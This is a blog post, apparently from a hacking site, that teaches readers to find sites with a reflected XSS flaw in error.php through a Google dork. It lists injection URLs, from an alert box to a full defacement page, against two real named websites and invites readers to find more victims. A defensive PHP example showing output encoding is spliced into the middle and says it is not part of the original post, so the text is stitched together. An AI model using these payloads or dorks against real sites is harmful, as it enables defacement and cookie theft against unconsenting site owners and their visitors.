Saturday, 31 October 2015

error.php XSS (Cross Site Scripting) Vulnerabilities 2016

Title : error.php XSS
Risk : Cross site scripting, cookie grabbing
PoC : error.php?error=
Dork : "inurl:error.php?error="
Author : Minhal Mehdi (devilscafe.in)
Browser : Mozilla Firefox






1). Go to Google and type the dork "inurl:error.php?error=".
In the search results, ignore the extra results with a different URL, like error-php-error.php,
and pick only sites with the URL www.site.com/error.php?error=

2). Now type your first tag to check for the vulnerability.
Example: www.site.com/error.php?error=<h1>Test</h1>
If the page shows the word "Test" rendered as a header, the error parameter is being written into the page without HTML encoding, and the site is vulnerable.
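
The test in step 2 succeeds because the page writes the error parameter into its HTML unencoded. The following is an added example, not code from the original post or from any site it names, of an error.php written so that the test fails; the message table, the "Reference" line and the 64-byte limit are assumptions for illustration (PHP 8.0 or later).

```php
<?php
declare(strict_types=1);

// Vulnerable pattern that the step-2 test detects (shown as a comment only):
//   echo '<p>' . $_GET['error'] . '</p>';  // the parameter is parsed as markup

// Hypothetical allow-list: the URL carries a short code, never the message text.
const ERROR_MESSAGES = [
    'notfound' => 'The page you requested does not exist.',
    'denied'   => 'You are not allowed to view this page.',
    'expired'  => 'Your session has expired. Please sign in again.',
];

/** Encode a value for an HTML text or quoted-attribute context. */
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Build the error page body from the untrusted ?error= value. */
function render_error(mixed $raw): string
{
    // ?error[]=x arrives as an array; anything that is not a string is unknown.
    $code = is_string($raw) ? $raw : '';
    $known = array_key_exists($code, ERROR_MESSAGES);
    $message = $known ? ERROR_MESSAGES[$code] : 'An unknown error occurred.';
    $html = '<h1>Error</h1><p>' . html_escape($message) . '</p>';
    if (!$known && $code !== '') {
        // If the raw value has to be shown, truncate it first and then encode it,
        // so any markup in it is displayed as text instead of being parsed.
        $html .= '<p>Reference: <code>' . html_escape(substr($code, 0, 64)) . '</code></p>';
    }
    return $html;
}

// Defence in depth: inline script is refused even if an encoding step is missed,
// and the session cookie cannot be read from JavaScript (the cookie-grabbing risk).
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'");
header('X-Content-Type-Options: nosniff');
header('Content-Type: text/html; charset=UTF-8');
// Takes effect when the application later calls session_start(); 'secure' needs HTTPS.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);

echo '<!doctype html><html><head><title>Error</title></head><body>';
echo render_error($_GET['error'] ?? '');
echo '</body></html>';
```

With the message text taken from the table, none of the tags listed in this post reach the page as markup, and the title stays fixed.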

Here are a few ways in which you can inject your XSS vector :)

How to show a header XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>

How to show the header in the center XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<center><h1>Hacked</h1></center>

How to show a title XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>

How to add an image XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbRsPwyz0WHjVvS9m-EE7xmkasRkwpLH-R-e_wavQ9gNje9ClsH6xNSckw1eGE9U2NGciJG9HzFia4upikWlxx2fD35fLI3chd1XMUe6xaeX_i55frSH-BKQ3tJCw_5f6UE7OHLTPUNiyR/s640/cats.jpg"/>

How to add a message XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<p><b>Your Message Here<b></p>

How to write a message across several lines XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<p><b>First line<br>Second Line <b></p> 

How to add scrolling text XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>

How to add an alert box XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<script>alert("hello");</script>

How to add a background colour to the page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<body bgcolor="red"/>

How to add a full deface page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="http://t0.gstatic.com/images?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA"/>
<marquee><b>www.thehackerstore.net</b></marquee>

You can add more HTML and JavaScript tags here.
Here is another demo site:
www.carrubbers.org/error.php?error=<center><h1>www.thehackerstore.net</h1></center>
Find more websites with dorks :)

If you have any queries, feel free to comment below :)

